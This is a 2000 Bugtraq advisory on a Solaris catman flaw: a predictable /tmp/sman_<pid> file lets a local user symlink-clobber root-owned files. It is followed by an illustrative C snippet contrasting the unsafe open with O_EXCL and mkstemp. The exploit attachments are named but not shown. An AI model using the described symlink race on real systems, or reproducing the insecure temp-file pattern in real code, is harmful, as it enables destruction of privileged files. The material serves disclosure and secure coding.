[18191] in bugtraq
Catman file clobbering vulnerability Solaris 2.x
daemon@ATHENA.MIT.EDU (Larry W. Cashdollar)
Tue Dec 19 18:13:07 2000
Message-ID: <Pine.SOL.4.21.0012182049560.19155-300000@Vapid.dhs.org>
Date: Mon, 18 Dec 2000 20:52:29 -0800
Reply-To: "Larry W. Cashdollar" <lwc@VAPID.DHS.ORG>
From: "Larry W. Cashdollar" <lwc@VAPID.DHS.ORG>
To: BUGTRAQ@SECURITYFOCUS.COM
Solaris 2.7/2.8 catman temp file vulnerability.
Larry W. Cashdollar
Vapid Labs
Date Published: 12/18/2000
Advisory ID: 11242000-02
Risk: Low
Title: catman temp file vulnerability.
Class: insecure temp file handling.
Remotely Exploitable: no
Locally Exploitable: Yes
Vulnerability Description:
By symlinking the temporary files that /usr/bin/catman creates when it is
run by root, a local user can clobber root-owned files.
Vulnerable Packages/Systems: Solaris 2.x Sparc/x86
Solution/Vendor Information/Workaround:
The vendor is currently working on releasing a patch. See references
section for Vendor contact information.
Sun BugID: 4392144
Vendor notified on: 11/23/2000
Credits:
I alerted Sun to this issue on 11/23/2000; they responded on 11/24/2000. Kudos
to the Sun Engineering group. This response time should be a model to
other vendors.
Technical Description:
The catman command creates preformatted versions of the online
manual. It also creates the windex database for utilities like apropos
and whatis. The problem is that catman creates a temporary file in
/tmp with a predictable name of the form /tmp/sman_pidofcatman. An
attacker can monitor the process list for the execution of catman and
create a symlink at that name pointing to a root-owned file. When run by
root, catman will then overwrite the contents of that file. This is a new
bug for catman and is not addressed in the current patch cluster for
Solaris 2.7 Sparc.
Exploit/Concept Code: see attachments.
References:
Sun Microsystems.
http://www.sun.com
Vapid Labs.
http://vapid.betteros.org
Email: Larry W. Cashdollar <lwc@vapid.betteros.org>
DISCLAIMER:
The contents of this advisory are copyright (c) 2000 Larry W. Cashdollar and
may be distributed freely provided that no fee is charged for this
distribution and proper credit is given.
Ver 2.4 11/29/2000
Attachments: catman-race.pl, ctman-race2.pl
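The bug class from the Technical Description next to two safe ways of creating the file, as an added example (it is not the advisory's attachment and not catman's source). Only the sman_ name prefix comes from the advisory; the function names, the open flags of the "predictable" variant, the scratch directory and the PID 12345 are assumptions constructed for illustration.

```c
#define _XOPEN_SOURCE 700
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Assumed pattern behind the bug: PID-based name, O_TRUNC and no O_EXCL,
 * so a symlink already at that name is followed and its target truncated. */
int open_tmp_predictable(const char *dir, long pid) {
    char path[4096];
    snprintf(path, sizeof path, "%s/sman_%ld", dir, pid);
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0644);
}
/* Hardened: O_CREAT|O_EXCL fails (EEXIST) if the name exists, symlinks included. */
int open_tmp_exclusive(const char *dir, long pid) {
    char path[4096];
    snprintf(path, sizeof path, "%s/sman_%ld", dir, pid);
    return open(path, O_WRONLY | O_CREAT | O_EXCL, 0600);
}
/* Preferred: mkstemp() picks an unpredictable name and creates it exclusively. */
int open_tmp_mkstemp(const char *dir, char *tmpl, size_t len) {
    snprintf(tmpl, len, "%s/sman_XXXXXX", dir);
    return mkstemp(tmpl);
}
/* Constructed scenario in a private scratch dir: a symlink occupies the
 * predictable name and points at "victim" (5 bytes). Returns victim's size. */
long victim_size_after(int exclusive, int *fd_out) {
    char dir[] = "/tmp/smandemo_XXXXXX", victim[64], link[64];
    struct stat st;
    if (!mkdtemp(dir)) return -1;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(link, sizeof link, "%s/sman_%d", dir, 12345); /* constructed PID */
    FILE *f = fopen(victim, "w");
    if (!f) return -1;
    fputs("data\n", f); fclose(f);
    if (symlink(victim, link) != 0) return -1;
    *fd_out = (exclusive ? open_tmp_exclusive : open_tmp_predictable)(dir, 12345);
    if (*fd_out >= 0) close(*fd_out);
    if (stat(victim, &st) != 0) return -1;
    unlink(link); unlink(victim); rmdir(dir);
    return (long)st.st_size;
}
int main(void) {
    int fd;
    printf("predictable open: victim is %ld bytes\n", victim_size_after(0, &fd));
    printf("exclusive open:   victim is %ld bytes\n", victim_size_after(1, &fd));
    return 0;
}
```

With the exclusive variant the open fails and the caller has to treat that as an error rather than retry with weaker flags.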